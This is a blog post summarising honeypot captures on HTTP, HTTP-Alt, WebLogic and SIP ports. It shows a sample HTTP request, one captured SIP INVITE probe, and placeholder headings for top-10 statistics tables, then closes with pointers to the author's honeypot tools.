A Look Into Honeypot Data

pew pew Norse map

I’ve been collecting data from honeypots for several years. During that time I never really did an in-depth analysis of the data. I do generate and publish high-level stats (published here), and every now and then I’ll casually browse the data and stumble onto some interesting payloads (one example). However, the data I’ve reported on and make available via API is focused on top targeted services and malicious IPs. While that high-level information has good value, there is much more data that can be used to produce additional metrics and extract useful information from. In an effort to dive further into the data I’ve started to apply additional parsing of payloads for various services. In this post, I’ll share data from HTTP, HTTP-Alt, WebLogic, and SIP services, and I plan to publish subsequent posts for other services.

A general note about the results, I still would not consider this an in-depth analysis. This just an initial pass at the data, even the scripts I wrote to extract the data are relatively crude. The output is fairly raw, but I’ve modified references to the destination IP addresses (the honeypot sensor) to x.x.x.x. Over time I’ll improve the extraction and analysis of the data.

Initial Parsing

As I mentioned, the focus in this post is on HTTP, HTTP-Alt, WebLogic, and SIP services (while SIP is not an HTTP protocol, SIP requests are very similar to HTTP). To keep it simple, I focused on the first line of the request payload, which if well formed will contain 4 components: Method, URL, Query String, and Protocol Version. Below are example requests, notice the SIP request has basically the same structure as HTTP.

Example full HTTP request (HTTP-Alt & WebLogic are similar):

GET /test.php?query_parameter=test HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close

Example SIP payload

INVITE sip:00442080503039@x.x.x.x:5060;transport=udp;user=phone SIP/2.0
Via: SIP/2.0/UDP 157.52.146.74:5060;branch=z9hG4bK-688856-1---swc2hkgz04oz8ezx;rport
Max-Forwards: 70
Contact: <sip:88894476642@157.52.146.74:5060;transport=udp>
To: <sip:00442080503039@x.x.x.x:5060;transport=udp;user=phone>
From: <sip:88894476642@157.52.146.74:5060;transport=udp;user=phone>;tag=iwfa2p8g
Call-ID: QRfsnfhUzcLwJnVz2fQeaW..
CSeq: 1 INVITE
Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, REFER, MESSAGE, OPTIONS, INFO, SUBSCRIBE
Content-Type: application/sdp
User-Agent: Alcatel-Lucent 5060 MGC-8 9.3.0.8
Allow-Events: presence, kpml, talk
Content-Length: 649

The Data

For each service, I generated a list of values for each of the four components. There is also a fifth list, malformed requests, which contains requests that did not parse cleanly since they were not a properly formed request. In most cases, this means there were extra spaces in the first line or less than the expected four components. These malformed requests appeared to be a result of fuzzing, injection payloads, encoded payloads, or scanners probing any port regardless of the intended service.

HTTP

This data consists of all requests to port 80 (HTTP) and port 443 (HTTPS).

Method

Top 10 HTTP methods

See all HTTP method data here.

Path

Top 10 HTTP paths

The path is a good indicator of what application is being targeted. It’s clear that phpMyAdmin is highly targeted. As you review that data you’ll see many more targeted apps.

See all HTTP path data here.

Query String

Top 10 HTTP query strings

The empty value in row two are requests where no query string was provided.

In row three, notice the parameter indicates an attempt to execute commands on the server. If executed, it would result in downloading and executing a script.

See all HTTP query string data here.

Protocol Version

Top 10 HTTP protocol versions

Note rows seven and ten are blank. My assumption is at least one of those is not actually blank, but contains a non-printable character.

See all HTTP protocol versions data here.

Malformed Requests

Top 10 HTTP malformed requests

Note, each value is enclosed in [‘ ‘]. This is an artifact from the Python script I used to parse requests.

The top ten are not so interesting. To find more interesting payloads review all the malformed requests data — link below.

See all HTTP malformed requests data here.

HTTP-Alt

This data consists of all requests to port 8080.

Method

Top 10 HTTP-Alt methods

See all HTTP-Alt method data here.

Path

Top 10 HTTP-Alt paths

See all HTTP-Alt path data here.

Query String

Top 10 HTTP-Alt query strings

See all HTTP-Alt query string data here.

Protocol Version

Top 10 HTTP-Alt protocol versions

See all HTTP-Alt protocol version data here.

Malformed Requests

Top 10 HTTP-Alt malformed requests

See all HTTP-Alt malformed requests data here.

WebLogic

This data consists of all requests to port 7001.

Method

Top WebLogic methods

See all WebLogic method data here.

Path

Top 10 WebLogic paths

See all WebLogic path data here.

Query String

Top webLogic query strings

See all WebLogic query strings data here.

Protocol Version

Top WebLogic protocol versions

See all WebLogic protocol version data here.

Malformed Requests

Top 10 WebLogic malformed requests

See all WebLogic malformed requests data here.

SIP

This data consists of all requests to port 5060.

Method

Top 10 SIP methods

See all SIP method data here.

Path

Top 10 SIP paths

See all SIP path data here.

Query String

None

Protocol Version

Top SIP protocol versions

See all SIP protocol versions data here.

Malformed Requests

Top 10 SIP malformed requests

See all SIP malformed requests data here.

Conclusion

While there is no ground breaking findings in this data, the data does provide some basic patterns of what to expect will hit your web applications or SIP (VOIP) services. In a sense, this establishes the normal noise. By continuing to monitor the expected noise, any new patterns (e.g. probes or attacks) will quickly stand out. Those new patterns should prove to be more interesting as they may reveal new attack targets or exploits.

Up Next

In future posts I’ll expand this analysis to the contents of HTTP POST requests. The content or body of POST requests will contain more interesting payloads. I’ll also expand analysis to services that are aligned with IoT. Stay tuned.

How Can I Do This?

If you are interested in running your own honeypot to capture data and perform your own analysis, I have a few tools for you. HoneyPy is a low to medium interaction honeypot that can be configured to report data into HoneyDB or several other destinations. An option to running HoneyPy is the HoneyDB Agent, more details on getting started here.